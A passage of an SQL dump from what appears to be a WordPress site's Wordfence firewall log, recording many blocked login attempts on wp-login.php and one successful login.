Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7629,1564555670.945727,1564555670.545000,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7630,1564555668.776714,1564555668.386900,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7631,1564555667.022538,1564555666.686800,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7632,1564555665.413461,1564555665.047900,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7633,1564555663.312474,1564555662.857200,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7634,1564555661.599118,1564555661.106700,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7635,1564555659.876075,1564555659.504800,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7636,1564555657.836433,1564555657.361900,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7637,1564555656.034362,1564555655.671600,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7638,1564555654.375096,1564555654.000300,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7639,1564555652.297391,1564555651.760600,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7640,1564555650.478162,1564555649.827000,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7641,1564555648.560747,1564555647.909900,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7642,1564555646.084879,1564555645.553300,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7643,1564555644.255214,1564555643.706000,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7644,1564555642.376398,1564555641.901800,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7645,1564555640.126939,1564555639.667000,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7646,1564555638.345313,1564555637.921400,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7647,1564555636.232818,1564555635.614900,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7648,1564555633.849679,1564555632.884600,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7649,1564555631.548486,1564555631.158200,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7650,1564555629.855674,1564555629.379000,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7651,1564555627.159057,1564555626.545500,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7652,1564555625.170710,1564555624.659500,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7653,1564555623.276735,1564555622.764300,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7654,1564555620.950051,1564555620.486500,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7655,1564555619.217905,1564555618.851700,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7656,1564555617.588109,1564555617.198100,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7657,1564555615.485677,1564555615.017000,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7658,1564555613.710814,1564555613.368600,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7659,1564555612.046372,1564555611.231100,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7660,1564555609.513213,1564555609.137500,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7661,1564555607.894569,1564555607.582200,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7662,1564555606.322036,1564555605.990400,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7663,1564555604.230201,1564555603.765300,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7664,1564555602.470966,1564555602.094000,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7665,1564555600.742010,1564555600.345800,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7666,1564555598.593168,1564555598.152200,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7667,1564555596.917589,1564555596.446100,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7668,1564555595.156702,1564555594.458300,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7669,1564555592.552255,1564555592.050200,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7670,1564555590.760494,1564555590.296100,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7671,1564555589.034707,1564555588.611700,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7672,1564555586.863985,1564555586.447400,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7673,1564555585.126151,1564555584.673100,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7674,1564555583.368428,1564555582.973700,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7675,0.000000,1564556996.125185,'\0\0\0\0\0\0\0\0\0\0G',0,302,0,3,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36','loginOK',NULL,NULL),(7676,0.000000,1564575918.539863,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7677,1564576134.667521,1564576133.923100,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7678,1564576133.517582,1564576132.419000,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7679,1564576126.928073,1564576126.402400,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7680,1564576120.978968,1564576120.585600,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7681,1564576119.692686,1564576119.233700,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7682,1564576113.781530,1564576112.942800,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7683,1564576111.955029,1564576111.391100,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7684,1564576105.915815,1564576104.969900,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7685,1564576099.529757,1564576099.035300,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7686,1564576093.568141,1564576092.947500,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7687,1564576092.598943,1564576092.016100,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7688,1564576091.078347,1564576090.559000,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7689,1564576084.593911,1564576083.996300,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7690,1564576078.179716,1564576077.838800,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7691,1564576077.438186,1564576076.957500,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security 